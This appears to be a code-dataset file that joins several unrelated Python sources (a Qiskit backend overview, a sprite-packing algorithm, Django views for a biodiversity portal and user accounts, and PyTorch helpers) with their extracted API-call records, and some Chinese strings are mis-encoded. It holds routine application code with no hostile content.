"qiskit.tools.monitor.backend_overview",
"qiskit.IBMQ.get_provider"
] |
[((128, 172), 'qiskit.IBMQ.enable_account', 'IBMQ.enable_account', (['"""Insert API token here"""'], {}), "('Insert API token here')\n", (147, 172), False, 'from qiskit import IBMQ\n'), ((219, 249), 'qiskit.IBMQ.get_provider', 'IBMQ.get_provider', ([], {'hub': '"""ibm-q"""'}), "(hub='ibm-q')\n", (236, 249), False, 'from qiskit import IBMQ\n'), ((251, 269), 'qiskit.tools.monitor.backend_overview', 'backend_overview', ([], {}), '()\n', (267, 269), False, 'from qiskit.tools.monitor import backend_overview\n')]
|
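The same (now deprecated) qiskit.tools.monitor module also provides backend_monitor for inspecting a single device; a variation on the script above, with the backend name being only an example:

from qiskit import IBMQ
from qiskit.tools.monitor import backend_monitor

IBMQ.enable_account('Insert API token here')
provider = IBMQ.get_provider(hub='ibm-q')
backend = provider.get_backend('ibmq_qasm_simulator')  # example backend name
backend_monitor(backend)  # detailed report for just this device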
import copy
class SquareAlgorithmNode(object):
def __init__(self, x=0, y=0, width=0, height=0, used=False,
down=None, right=None):
"""Node constructor.
:param x: X coordinate.
:param y: Y coordinate.
:param width: Image width.
:param height: Image height.
:param used: Flag to determine if the node is used.
:param down: Down :class:`~Node`.
:param right Right :class:`~Node`.
"""
self.x = x
self.y = y
self.width = width
self.height = height
self.used = used
self.right = right
self.down = down
def find(self, node, width, height):
"""Find a node to allocate this image size (width, height).
:param node: Node to search in.
        :param width: Image width to allocate.
        :param height: Image height to allocate.
"""
if node.used:
return self.find(node.right, width, height) or self.find(node.down, width, height)
elif node.width >= width and node.height >= height:
return node
return None
def grow(self, width, height):
""" Grow the canvas to the most appropriate direction.
        :param width: Pixels to grow (width).
        :param height: Pixels to grow (height).
"""
can_grow_d = width <= self.width
can_grow_r = height <= self.height
should_grow_r = can_grow_r and self.height >= (self.width + width)
should_grow_d = can_grow_d and self.width >= (self.height + height)
if should_grow_r:
return self.grow_right(width, height)
elif should_grow_d:
return self.grow_down(width, height)
elif can_grow_r:
return self.grow_right(width, height)
elif can_grow_d:
return self.grow_down(width, height)
return None
def grow_right(self, width, height):
"""Grow the canvas to the right.
        :param width: Pixels to grow right (width).
        :param height: Height of the node to allocate.
"""
old_self = copy.copy(self)
self.used = True
self.x = self.y = 0
self.width += width
self.down = old_self
self.right = SquareAlgorithmNode(x=old_self.width,
y=0,
width=width,
height=self.height)
node = self.find(self, width, height)
if node:
return self.split(node, width, height)
return None
def grow_down(self, width, height):
"""Grow the canvas down.
        :param width: Width of the node to allocate.
        :param height: Pixels to grow down (height).
"""
old_self = copy.copy(self)
self.used = True
self.x = self.y = 0
self.height += height
self.right = old_self
self.down = SquareAlgorithmNode(x=0,
y=old_self.height,
width=self.width,
height=height)
node = self.find(self, width, height)
if node:
return self.split(node, width, height)
return None
def split(self, node, width, height):
"""Split the node to allocate a new one of this size.
        :param node: Node to be split.
:param width: New node width.
:param height: New node height.
"""
node.used = True
node.down = SquareAlgorithmNode(x=node.x,
y=node.y + height,
width=node.width,
height=node.height - height)
node.right = SquareAlgorithmNode(x=node.x + width,
y=node.y,
width=node.width - width,
height=height)
return node
class SquareAlgorithm(object):
def process(self, sprite):
root = SquareAlgorithmNode(width=sprite.images[0].absolute_width,
height=sprite.images[0].absolute_height)
        # Loop over all the images, creating a binary tree
for image in sprite.images:
node = root.find(root, image.absolute_width, image.absolute_height)
if node: # Use this node
node = root.split(node, image.absolute_width, image.absolute_height)
else: # Grow the canvas
node = root.grow(image.absolute_width, image.absolute_height)
image.x = node.x
image.y = node.y
|
[
"copy.copy"
] |
[((2132, 2147), 'copy.copy', 'copy.copy', (['self'], {}), '(self)\n', (2141, 2147), False, 'import copy\n'), ((2823, 2838), 'copy.copy', 'copy.copy', (['self'], {}), '(self)\n', (2832, 2838), False, 'import copy\n')]
|
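Driving the packer above only requires objects that expose absolute_width/absolute_height and accept x/y assignments; the sprite and image stand-ins below are invented purely to exercise SquareAlgorithm.process():

class FakeImage:
    def __init__(self, w, h):
        self.absolute_width = w
        self.absolute_height = h
        self.x = self.y = None

class FakeSprite:
    def __init__(self, images):
        self.images = images

sprite = FakeSprite([FakeImage(64, 64), FakeImage(32, 64), FakeImage(64, 32)])
SquareAlgorithm().process(sprite)
for img in sprite.images:
    print(img.x, img.y, img.absolute_width, img.absolute_height)
# The first image lands at (0, 0); the canvas then grows right and down
# to place the remaining two without overlap.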
import re
import csv
import codecs
import json
import os
import environ
from django.shortcuts import render, get_object_or_404
from django.http import (
HttpResponse,
HttpResponseNotFound,
)
from django.db.models import (
Q,
F,
Count,
Sum
)
from django.conf import settings
from apps.data.models import (
Dataset,
Taxon,
SimpleData,
)
from apps.article.models import Article
from .models import Post, Journal
from utils.mail import taibif_mail_contact_us
from apps.data.helpers.stats import get_home_stats
from django.utils.translation import ugettext as _
from django.views.decorators.http import require_GET
def index(request):
news_list = Article.objects.filter(category='NEWS').all()[0:4]
event_list = Article.objects.filter(category='EVENT').all()[0:4]
update_list = Article.objects.filter(category='UPDATE').all()[0:4]
#topic_list = Article.objects.filter(category__in=['SCI', 'TECH', 'PUB']).order_by('?').all()[0:10]
topic_list = Article.objects.filter(is_homepage=True).order_by('?').all()[0:10]
context = {
'news_list': news_list,
'event_list': event_list,
'update_list': update_list,
'topic_list': topic_list,
'stats': get_home_stats(),
}
return render(request, 'index.html', context)
def publishing_data(request):
return render(request, 'publishing-data.html')
def journals(request):
Journal_url = Journal.objects.all()
return render(None,'journals.html', locals())
def cookbook(request):
return render(request, 'cookbook.html')
def cookbook_detail_1(request):
return render(request, 'cookbook-detail-1.html')
def cookbook_detail_2(request):
return render(request, 'cookbook-detail-2.html')
def cookbook_detail_3(request):
return render(request, 'cookbook-detail-3.html')
def tools(request):
return render(request, 'tools.html')
def contact_us(request):
if request.method == 'GET':
return render(request, 'contact-us.html')
elif request.method == 'POST':
data = {
'name': request.POST.get('name', ''),
'cat': request.POST.get('cat', ''),
'email': request.POST.get('email', ''),
'content': request.POST.get('content', ''),
}
context = taibif_mail_contact_us(data)
#context = taibif_send_mail(subject, content, settings.SERVICE_EMAIL, to_list)
return render(request, 'contact-us.html', context)
def plans(request):
return render(request, 'plans.html')
def links(request):
Post_url = Post.objects.all()
return render(None,'links.html', locals())
def about_taibif(request):
return render(request, 'about-taibif.html')
def about_gbif(request):
return render(request, 'about-gbif.html')
def open_data(request):
return render(request, 'open-data.html')
def data_stats(request):
is_most = request.GET.get('most', '')
query = Dataset.objects #.exclude(status='Private')
if is_most:
query = query.filter(is_most_project=True)
context = {
'dataset_list': query.order_by(F('pub_date').desc(nulls_last=True)).all(),
'env': settings.ENV
}
return render(request, 'data-stats.html', context)
def common_name_checker(request):
global results
if request.method == 'GET':
q = request.GET.get('q', '')
sep = request.GET.get('sep', '')
context = {
'q': q,
'sep': sep,
}
return render(request, 'tools-common_name_checker.html', context)
elif request.method == 'POST':
q = request.POST.get('q', '')
sep = request.POST.get('sep', 'n')
if not q:
context = {
'message': {
                'head': '輸入錯誤',
                'content': '請輸入中文名',
}
}
return render(request, 'tools-common_name_checker.html', context)
        if q in ['台灣', '臺灣']:
context = {
'message': {
                    'head': '結果太多',
                    'content': '請輸入更完整中文名',
},
'sep': sep,
'q': q,
}
return render(request, 'tools-common_name_checker.html', context)
if not sep:
sep = 'n'
results = []
if sep not in [',', 'n']:
return HttpResponseNotFound('err input')
sep_real = '\n' if sep == 'n' else sep
cname_list = q.split(sep_real)
cname_list = list(set(cname_list))
#taiwan_char_check_exclude = ['ๅฐ็ฃ็้ณฅ', 'ๅฐ็ฃ้ๅข', 'ๅฐ็ฃไบ็จฎ', 'ๅฐ็ฃ็นๆไบ็จฎ']
for cn in cname_list:
cn = cn.strip()
q_replace = ''
if 'ๅฐ็ฃ' in cn:
q_replace = cn.replace('ๅฐ็ฃ', '่บ็ฃ')
if '่บ็ฃ' in cn:
q_replace = cn.replace('่บ็ฃ', 'ๅฐ็ฃ')
row = {
'common_name': cn,
'match_type': 'no match',
'match_list': []
}
taxa = Taxon.objects.filter(rank='species')
if q_replace:
row['q_replace'] = q_replace
taxa = Taxon.objects.filter(Q(name_zh__icontains=cn) | Q(name_zh__icontains=q_replace)).all()
else:
taxa = Taxon.objects.filter(name_zh__icontains=cn).all()
if taxa:
row['match_type'] = 'match'
for t in taxa:
row['match_list'].append(t)
results.append(row)
context = {
'results': results,
'q': q,
'sep': sep,
}
return render(request, 'tools-common_name_checker.html', context)
def export_csv(request):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="users.csv"'
response.write(codecs.BOM_UTF8)
writer = csv.writer(response)
for row in results:
writer.writerow(row['match_list'])
return response
def trans(request):
    translate_str = _("這裡放需要翻譯的文字")
context = {"translate_str": translate_str}
return render(request, 'index.html', context)
@require_GET
def robots_txt(request):
if os.environ.get('ENV')=='prod':
lines = [
"User-Agent: *",
"Disallow: /admin/",
]
return HttpResponse("\n".join(lines), content_type="text/plain")
else:
lines = [
"User-Agent: *",
"Disallow: /",
]
return HttpResponse("\n".join(lines), content_type="text/plain")
## Kuan-Yu added for API occurence record
def test(request):
Yearquery = SimpleData.objects \
.filter(scientific_name='Rana latouchii') \
.values('scientific_name', 'vernacular_name', 'year') \
.exclude(year__isnull=True) \
.annotate(count=Count('year')) \
.order_by('-count')
year_rows = [{
'key': x['scientific_name'],
'label': x['vernacular_name'],
'year': x['year'],
'count': x['count']
} for x in Yearquery]
context = {
'occurrence_list': year_rows,
}
return render(request, 'test.html', context)
###example
filt1 = 'speices'
filt2 = 'database'
pk1 = '<NAME>'
pk2 = 'manager_17_15'
pk3 = '<NAME>'
pk4 = 'e10100001_4_10'
def ChartYear(request):
if filt1 == 'hi':
species = SimpleData.objects.filter(Q(scientific_name=pk1) | Q(scientific_name=pk3))
sp_year = species.values('year') \
.exclude(year__isnull=True) \
.annotate(count=Count('year')) \
.order_by('-year')
chart_year = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'year': x['year'],
'count': x['count']
} for x in sp_year
]
]
if filt2 == 'you':
dataset = SimpleData.objects.filter(Q(taibif_dataset_name=pk2) | Q(taibif_dataset_name=pk4))
data_year = dataset.values( 'year') \
.exclude(year__isnull=True) \
.annotate(count=Count('year')) \
.order_by('-year')
chart_year = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'year': x['year'],
'count': x['count']
} for x in data_year
]
]
if (filt2 == filt2 and filt1 == filt1):
data_sp = SimpleData.objects.filter(Q(scientific_name=pk1) | Q(scientific_name=pk3)) \
.filter(Q(taibif_dataset_name=pk2) | Q(taibif_dataset_name=pk4))
data_sp_month = data_sp.values('year') \
.exclude(year__isnull=True) \
.annotate(count=Count('year')) \
.order_by('-year')
chart_year = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'year': x['year'],
'count': x['count']
} for x in data_sp_month
]
]
return HttpResponse(json.dumps(chart_year), content_type="application/json")
def ChartMonth(request):
if filt1 == 'hi':
species = SimpleData.objects.filter(Q(scientific_name=pk1) | Q(scientific_name=pk3))
sp_month = species.values( 'month') \
.exclude(month__isnull=True) \
.annotate(count=Count('month')) \
.order_by('-month')
chart_month = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'month': x['month'],
'count': x['count']
} for x in sp_month
]
]
if filt2 == 'you':
dataset = SimpleData.objects.filter(Q(taibif_dataset_name=pk2) | Q(taibif_dataset_name=pk4))
data_month = dataset.values('month') \
.exclude(month__isnull=True) \
.annotate(count=Count('month')) \
.order_by('-month')
chart_month = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'month': x['month'],
'count': x['count']
} for x in data_month
]
]
if (filt2 == filt2 and filt1 == filt1):
data_sp = SimpleData.objects.filter(Q(scientific_name=pk1) | Q(scientific_name=pk3)) \
.filter(Q(taibif_dataset_name=pk2) | Q(taibif_dataset_name=pk4))
data_sp_month = data_sp.values('month') \
.exclude(month__isnull=True) \
.annotate(count=Count('month')) \
.order_by('-month')
chart_month = [
{
"page": 1,
"pages": 1,
"per_page": "50",
"total": 1
},
[
{
'month': x['month'],
'count': x['count']
} for x in data_sp_month
]
]
return HttpResponse(json.dumps(chart_month), content_type="application/json")
|
[
"csv.writer",
"django.http.HttpResponse",
"apps.article.models.Article.objects.filter",
"json.dumps",
"django.db.models.Q",
"apps.data.helpers.stats.get_home_stats",
"os.environ.get",
"django.http.HttpResponseNotFound",
"django.db.models.F",
"apps.data.models.SimpleData.objects.filter",
"apps.data.models.Taxon.objects.filter",
"django.shortcuts.render",
"django.utils.translation.ugettext",
"django.db.models.Count",
"utils.mail.taibif_mail_contact_us"
] |
[((1275, 1313), 'django.shortcuts.render', 'render', (['request', '"""index.html"""', 'context'], {}), "(request, 'index.html', context)\n", (1281, 1313), False, 'from django.shortcuts import render, get_object_or_404\n'), ((1356, 1395), 'django.shortcuts.render', 'render', (['request', '"""publishing-data.html"""'], {}), "(request, 'publishing-data.html')\n", (1362, 1395), False, 'from django.shortcuts import render, get_object_or_404\n'), ((1547, 1579), 'django.shortcuts.render', 'render', (['request', '"""cookbook.html"""'], {}), "(request, 'cookbook.html')\n", (1553, 1579), False, 'from django.shortcuts import render, get_object_or_404\n'), ((1624, 1665), 'django.shortcuts.render', 'render', (['request', '"""cookbook-detail-1.html"""'], {}), "(request, 'cookbook-detail-1.html')\n", (1630, 1665), False, 'from django.shortcuts import render, get_object_or_404\n'), ((1710, 1751), 'django.shortcuts.render', 'render', (['request', '"""cookbook-detail-2.html"""'], {}), "(request, 'cookbook-detail-2.html')\n", (1716, 1751), False, 'from django.shortcuts import render, get_object_or_404\n'), ((1796, 1837), 'django.shortcuts.render', 'render', (['request', '"""cookbook-detail-3.html"""'], {}), "(request, 'cookbook-detail-3.html')\n", (1802, 1837), False, 'from django.shortcuts import render, get_object_or_404\n'), ((1870, 1899), 'django.shortcuts.render', 'render', (['request', '"""tools.html"""'], {}), "(request, 'tools.html')\n", (1876, 1899), False, 'from django.shortcuts import render, get_object_or_404\n'), ((2503, 2532), 'django.shortcuts.render', 'render', (['request', '"""plans.html"""'], {}), "(request, 'plans.html')\n", (2509, 2532), False, 'from django.shortcuts import render, get_object_or_404\n'), ((2674, 2710), 'django.shortcuts.render', 'render', (['request', '"""about-taibif.html"""'], {}), "(request, 'about-taibif.html')\n", (2680, 2710), False, 'from django.shortcuts import render, get_object_or_404\n'), ((2748, 2782), 'django.shortcuts.render', 'render', (['request', '"""about-gbif.html"""'], {}), "(request, 'about-gbif.html')\n", (2754, 2782), False, 'from django.shortcuts import render, get_object_or_404\n'), ((2819, 2852), 'django.shortcuts.render', 'render', (['request', '"""open-data.html"""'], {}), "(request, 'open-data.html')\n", (2825, 2852), False, 'from django.shortcuts import render, get_object_or_404\n'), ((3190, 3233), 'django.shortcuts.render', 'render', (['request', '"""data-stats.html"""', 'context'], {}), "(request, 'data-stats.html', context)\n", (3196, 3233), False, 'from django.shortcuts import render, get_object_or_404\n'), ((5606, 5664), 'django.shortcuts.render', 'render', (['request', '"""tools-common_name_checker.html"""', 'context'], {}), "(request, 'tools-common_name_checker.html', context)\n", (5612, 5664), False, 'from django.shortcuts import render, get_object_or_404\n'), ((5708, 5745), 'django.http.HttpResponse', 'HttpResponse', ([], {'content_type': '"""text/csv"""'}), "(content_type='text/csv')\n", (5720, 5745), False, 'from django.http import HttpResponse, HttpResponseNotFound\n'), ((5869, 5889), 'csv.writer', 'csv.writer', (['response'], {}), '(response)\n', (5879, 5889), False, 'import csv\n'), ((6031, 6046), 'django.utils.translation.ugettext', '_', (['"""้่ฃกๆพ้่ฆ็ฟป่ญฏ็ๆๅญ"""'], {}), "('้่ฃกๆพ้่ฆ็ฟป่ญฏ็ๆๅญ')\n", (6032, 6046), True, 'from django.utils.translation import ugettext as _\n'), ((6105, 6143), 'django.shortcuts.render', 'render', (['request', '"""index.html"""', 'context'], {}), "(request, 'index.html', context)\n", (6111, 
6143), False, 'from django.shortcuts import render, get_object_or_404\n'), ((7141, 7178), 'django.shortcuts.render', 'render', (['request', '"""test.html"""', 'context'], {}), "(request, 'test.html', context)\n", (7147, 7178), False, 'from django.shortcuts import render, get_object_or_404\n'), ((1239, 1255), 'apps.data.helpers.stats.get_home_stats', 'get_home_stats', ([], {}), '()\n', (1253, 1255), False, 'from apps.data.helpers.stats import get_home_stats\n'), ((1973, 2007), 'django.shortcuts.render', 'render', (['request', '"""contact-us.html"""'], {}), "(request, 'contact-us.html')\n", (1979, 2007), False, 'from django.shortcuts import render, get_object_or_404\n'), ((3487, 3545), 'django.shortcuts.render', 'render', (['request', '"""tools-common_name_checker.html"""', 'context'], {}), "(request, 'tools-common_name_checker.html', context)\n", (3493, 3545), False, 'from django.shortcuts import render, get_object_or_404\n'), ((6191, 6212), 'os.environ.get', 'os.environ.get', (['"""ENV"""'], {}), "('ENV')\n", (6205, 6212), False, 'import os\n'), ((9335, 9357), 'json.dumps', 'json.dumps', (['chart_year'], {}), '(chart_year)\n', (9345, 9357), False, 'import json\n'), ((11454, 11477), 'json.dumps', 'json.dumps', (['chart_month'], {}), '(chart_month)\n', (11464, 11477), False, 'import json\n'), ((2295, 2323), 'utils.mail.taibif_mail_contact_us', 'taibif_mail_contact_us', (['data'], {}), '(data)\n', (2317, 2323), False, 'from utils.mail import taibif_mail_contact_us\n'), ((2427, 2470), 'django.shortcuts.render', 'render', (['request', '"""contact-us.html"""', 'context'], {}), "(request, 'contact-us.html', context)\n", (2433, 2470), False, 'from django.shortcuts import render, get_object_or_404\n'), ((690, 729), 'apps.article.models.Article.objects.filter', 'Article.objects.filter', ([], {'category': '"""NEWS"""'}), "(category='NEWS')\n", (712, 729), False, 'from apps.article.models import Article\n'), ((758, 798), 'apps.article.models.Article.objects.filter', 'Article.objects.filter', ([], {'category': '"""EVENT"""'}), "(category='EVENT')\n", (780, 798), False, 'from apps.article.models import Article\n'), ((828, 869), 'apps.article.models.Article.objects.filter', 'Article.objects.filter', ([], {'category': '"""UPDATE"""'}), "(category='UPDATE')\n", (850, 869), False, 'from apps.article.models import Article\n'), ((3862, 3920), 'django.shortcuts.render', 'render', (['request', '"""tools-common_name_checker.html"""', 'context'], {}), "(request, 'tools-common_name_checker.html', context)\n", (3868, 3920), False, 'from django.shortcuts import render, get_object_or_404\n'), ((4189, 4247), 'django.shortcuts.render', 'render', (['request', '"""tools-common_name_checker.html"""', 'context'], {}), "(request, 'tools-common_name_checker.html', context)\n", (4195, 4247), False, 'from django.shortcuts import render, get_object_or_404\n'), ((4365, 4398), 'django.http.HttpResponseNotFound', 'HttpResponseNotFound', (['"""err input"""'], {}), "('err input')\n", (4385, 4398), False, 'from django.http import HttpResponse, HttpResponseNotFound\n'), ((5009, 5045), 'apps.data.models.Taxon.objects.filter', 'Taxon.objects.filter', ([], {'rank': '"""species"""'}), "(rank='species')\n", (5029, 5045), False, 'from apps.data.models import Dataset, Taxon, SimpleData\n'), ((7399, 7421), 'django.db.models.Q', 'Q', ([], {'scientific_name': 'pk1'}), '(scientific_name=pk1)\n', (7400, 7421), False, 'from django.db.models import Q, F, Count, Sum\n'), ((7424, 7446), 'django.db.models.Q', 'Q', ([], {'scientific_name': 'pk3'}), 
'(scientific_name=pk3)\n', (7425, 7446), False, 'from django.db.models import Q, F, Count, Sum\n'), ((8017, 8043), 'django.db.models.Q', 'Q', ([], {'taibif_dataset_name': 'pk2'}), '(taibif_dataset_name=pk2)\n', (8018, 8043), False, 'from django.db.models import Q, F, Count, Sum\n'), ((8046, 8072), 'django.db.models.Q', 'Q', ([], {'taibif_dataset_name': 'pk4'}), '(taibif_dataset_name=pk4)\n', (8047, 8072), False, 'from django.db.models import Q, F, Count, Sum\n'), ((8739, 8765), 'django.db.models.Q', 'Q', ([], {'taibif_dataset_name': 'pk2'}), '(taibif_dataset_name=pk2)\n', (8740, 8765), False, 'from django.db.models import Q, F, Count, Sum\n'), ((8768, 8794), 'django.db.models.Q', 'Q', ([], {'taibif_dataset_name': 'pk4'}), '(taibif_dataset_name=pk4)\n', (8769, 8794), False, 'from django.db.models import Q, F, Count, Sum\n'), ((9487, 9509), 'django.db.models.Q', 'Q', ([], {'scientific_name': 'pk1'}), '(scientific_name=pk1)\n', (9488, 9509), False, 'from django.db.models import Q, F, Count, Sum\n'), ((9512, 9534), 'django.db.models.Q', 'Q', ([], {'scientific_name': 'pk3'}), '(scientific_name=pk3)\n', (9513, 9534), False, 'from django.db.models import Q, F, Count, Sum\n'), ((10118, 10144), 'django.db.models.Q', 'Q', ([], {'taibif_dataset_name': 'pk2'}), '(taibif_dataset_name=pk2)\n', (10119, 10144), False, 'from django.db.models import Q, F, Count, Sum\n'), ((10147, 10173), 'django.db.models.Q', 'Q', ([], {'taibif_dataset_name': 'pk4'}), '(taibif_dataset_name=pk4)\n', (10148, 10173), False, 'from django.db.models import Q, F, Count, Sum\n'), ((10850, 10876), 'django.db.models.Q', 'Q', ([], {'taibif_dataset_name': 'pk2'}), '(taibif_dataset_name=pk2)\n', (10851, 10876), False, 'from django.db.models import Q, F, Count, Sum\n'), ((10879, 10905), 'django.db.models.Q', 'Q', ([], {'taibif_dataset_name': 'pk4'}), '(taibif_dataset_name=pk4)\n', (10880, 10905), False, 'from django.db.models import Q, F, Count, Sum\n'), ((6837, 6850), 'django.db.models.Count', 'Count', (['"""year"""'], {}), "('year')\n", (6842, 6850), False, 'from django.db.models import Q, F, Count, Sum\n'), ((1002, 1042), 'apps.article.models.Article.objects.filter', 'Article.objects.filter', ([], {'is_homepage': '(True)'}), '(is_homepage=True)\n', (1024, 1042), False, 'from apps.article.models import Article\n'), ((7561, 7574), 'django.db.models.Count', 'Count', (['"""year"""'], {}), "('year')\n", (7566, 7574), False, 'from django.db.models import Q, F, Count, Sum\n'), ((8190, 8203), 'django.db.models.Count', 'Count', (['"""year"""'], {}), "('year')\n", (8195, 8203), False, 'from django.db.models import Q, F, Count, Sum\n'), ((8668, 8690), 'django.db.models.Q', 'Q', ([], {'scientific_name': 'pk1'}), '(scientific_name=pk1)\n', (8669, 8690), False, 'from django.db.models import Q, F, Count, Sum\n'), ((8693, 8715), 'django.db.models.Q', 'Q', ([], {'scientific_name': 'pk3'}), '(scientific_name=pk3)\n', (8694, 8715), False, 'from django.db.models import Q, F, Count, Sum\n'), ((8916, 8929), 'django.db.models.Count', 'Count', (['"""year"""'], {}), "('year')\n", (8921, 8929), False, 'from django.db.models import Q, F, Count, Sum\n'), ((9653, 9667), 'django.db.models.Count', 'Count', (['"""month"""'], {}), "('month')\n", (9658, 9667), False, 'from django.db.models import Q, F, Count, Sum\n'), ((10294, 10308), 'django.db.models.Count', 'Count', (['"""month"""'], {}), "('month')\n", (10299, 10308), False, 'from django.db.models import Q, F, Count, Sum\n'), ((10779, 10801), 'django.db.models.Q', 'Q', ([], {'scientific_name': 'pk1'}), 
'(scientific_name=pk1)\n', (10780, 10801), False, 'from django.db.models import Q, F, Count, Sum\n'), ((10804, 10826), 'django.db.models.Q', 'Q', ([], {'scientific_name': 'pk3'}), '(scientific_name=pk3)\n', (10805, 10826), False, 'from django.db.models import Q, F, Count, Sum\n'), ((11029, 11043), 'django.db.models.Count', 'Count', (['"""month"""'], {}), "('month')\n", (11034, 11043), False, 'from django.db.models import Q, F, Count, Sum\n'), ((3101, 3114), 'django.db.models.F', 'F', (['"""pub_date"""'], {}), "('pub_date')\n", (3102, 3114), False, 'from django.db.models import Q, F, Count, Sum\n'), ((5268, 5311), 'apps.data.models.Taxon.objects.filter', 'Taxon.objects.filter', ([], {'name_zh__icontains': 'cn'}), '(name_zh__icontains=cn)\n', (5288, 5311), False, 'from apps.data.models import Dataset, Taxon, SimpleData\n'), ((5161, 5185), 'django.db.models.Q', 'Q', ([], {'name_zh__icontains': 'cn'}), '(name_zh__icontains=cn)\n', (5162, 5185), False, 'from django.db.models import Q, F, Count, Sum\n'), ((5188, 5219), 'django.db.models.Q', 'Q', ([], {'name_zh__icontains': 'q_replace'}), '(name_zh__icontains=q_replace)\n', (5189, 5219), False, 'from django.db.models import Q, F, Count, Sum\n'), ((6638, 6697), 'apps.data.models.SimpleData.objects.filter', 'SimpleData.objects.filter', ([], {'scientific_name': '"""Rana latouchii"""'}), "(scientific_name='Rana latouchii')\n", (6663, 6697), False, 'from apps.data.models import Dataset, Taxon, SimpleData\n')]
|
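A standalone sketch of the 台灣/臺灣 spelling-variant expansion used inside common_name_checker above (the function name is made up):

def name_variants(common_name):
    """Return the query plus its 台灣<->臺灣 spelling variant, if any."""
    variants = [common_name]
    if '台灣' in common_name:
        variants.append(common_name.replace('台灣', '臺灣'))
    elif '臺灣' in common_name:
        variants.append(common_name.replace('臺灣', '台灣'))
    return variants

assert name_variants('台灣藍鵲') == ['台灣藍鵲', '臺灣藍鵲']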
# -*- coding: utf-8 -*-
from django.http import Http404, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseNotAllowed
from django.shortcuts import redirect
from django.contrib import messages
from bundestagger.helper.utils import is_post
from bundestagger.account.auth import logged_in
from bundestagger.account.models import User
@is_post
def logout(request):
from bundestagger.account.auth import logout as logout_func
logout_func(request)
next = "/"
if "next" in request.POST:
next = request.POST["next"]
return redirect(next)
@is_post
@logged_in
def change_username(request):
if "username" in request.POST:
user = request.bundesuser
username = request.POST["username"]
if username != user.username:
if len(username)>20:
messages.add_message(request, messages.INFO, u"Username ist zu lang")
elif len(username)==0:
messages.add_message(request, messages.INFO, u"Username ist zu kurz")
else:
uc = User.objects.filter(username=username).count()
if uc == 0:
user.username = request.POST["username"]
user.save()
request.session["bundesuser"] = user
messages.add_message(request, messages.INFO, u"Username geรคndert")
else:
messages.add_message(request, messages.INFO, u"Username ist schon vergeben")
next = "/"
if "next" in request.POST:
next = request.POST["next"]
return redirect(next)
|
[
"django.shortcuts.redirect",
"bundestagger.account.auth.logout",
"bundestagger.account.models.User.objects.filter",
"django.contrib.messages.add_message"
] |
[((440, 460), 'bundestagger.account.auth.logout', 'logout_func', (['request'], {}), '(request)\n', (451, 460), True, 'from bundestagger.account.auth import logout as logout_func\n'), ((554, 568), 'django.shortcuts.redirect', 'redirect', (['next'], {}), '(next)\n', (562, 568), False, 'from django.shortcuts import redirect\n'), ((1578, 1592), 'django.shortcuts.redirect', 'redirect', (['next'], {}), '(next)\n', (1586, 1592), False, 'from django.shortcuts import redirect\n'), ((824, 893), 'django.contrib.messages.add_message', 'messages.add_message', (['request', 'messages.INFO', 'u"""Username ist zu lang"""'], {}), "(request, messages.INFO, u'Username ist zu lang')\n", (844, 893), False, 'from django.contrib import messages\n'), ((945, 1014), 'django.contrib.messages.add_message', 'messages.add_message', (['request', 'messages.INFO', 'u"""Username ist zu kurz"""'], {}), "(request, messages.INFO, u'Username ist zu kurz')\n", (965, 1014), False, 'from django.contrib import messages\n'), ((1299, 1365), 'django.contrib.messages.add_message', 'messages.add_message', (['request', 'messages.INFO', 'u"""Username geรคndert"""'], {}), "(request, messages.INFO, u'Username geรคndert')\n", (1319, 1365), False, 'from django.contrib import messages\n'), ((1408, 1484), 'django.contrib.messages.add_message', 'messages.add_message', (['request', 'messages.INFO', 'u"""Username ist schon vergeben"""'], {}), "(request, messages.INFO, u'Username ist schon vergeben')\n", (1428, 1484), False, 'from django.contrib import messages\n'), ((1054, 1092), 'bundestagger.account.models.User.objects.filter', 'User.objects.filter', ([], {'username': 'username'}), '(username=username)\n', (1073, 1092), False, 'from bundestagger.account.models import User\n')]
|
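Both views depend on an is_post decorator imported from bundestagger.helper.utils, whose source is not shown in this row; a plausible minimal implementation (the real one may differ) is:

from functools import wraps
from django.http import HttpResponseNotAllowed

def is_post(view):
    """Reject anything but POST, matching the HttpResponseNotAllowed import above."""
    @wraps(view)
    def wrapped(request, *args, **kwargs):
        if request.method != 'POST':
            return HttpResponseNotAllowed(['POST'])
        return view(request, *args, **kwargs)
    return wrapped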
"""Utility functions for neural networks."""
import numpy as np
import torch
def detach(states):
"""Truncate backpropagation (usually used in RNN)."""
return [state.detach() for state in states]
def hasnan(m):
"""Check if torch.tensor m have NaNs in it."""
return np.any(np.isnan(m.cpu().data.numpy()))
def printnn(model):
"""Print out neural network."""
for name, param in model.named_parameters():
if param.requires_grad:
print("{}[{}]\n{}".format('-' * 30, name, param.data.numpy()))
def numparams(model):
"""Calculate the total number of learnable parameters."""
return sum(p.numel() for p in model.parameters())
class UnpackedSequence(object):
"""Unpack a PackedSequence to original (unpadded) examples."""
def __init__(self, ps):
"""Construct an unpacked sequence object."""
self.packed_sequence = ps
lencnt = [int(n) for n in ps.batch_sizes[:-1]-ps.batch_sizes[1:]] \
+ [int(ps.batch_sizes[-1])]
self.seqlengths = [] # seqlengths[i] contains length of example i
for num, ll in zip(lencnt[::-1], range(len(lencnt), 0, -1)):
self.seqlengths.extend([ll] * num)
assert len(self.seqlengths) == self.packed_sequence.batch_sizes[0]
def __len__(self):
"""Return number of examples in this batch."""
return len(self.seqlengths)
def __getitem__(self, i):
"""Get original idx-th item in the batch."""
idx = torch.LongTensor(self.seqlengths[i])
idx[0] = i
idx[1:] = self.packed_sequence.batch_sizes[:self.seqlengths[i]-1]
ei = self.packed_sequence.data[idx.cumsum(0)] # example i
return ei
|
[
"torch.LongTensor"
] |
[((1488, 1524), 'torch.LongTensor', 'torch.LongTensor', (['self.seqlengths[i]'], {}), '(self.seqlengths[i])\n', (1504, 1524), False, 'import torch\n')]
|
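A round-trip check for UnpackedSequence above: pack three variable-length sequences (already sorted by length, as pack_sequence expects) and recover each unpadded original:

import torch
from torch.nn.utils.rnn import pack_sequence

seqs = [torch.tensor([1, 2, 3, 4]), torch.tensor([5, 6]), torch.tensor([7])]
packed = pack_sequence(seqs)
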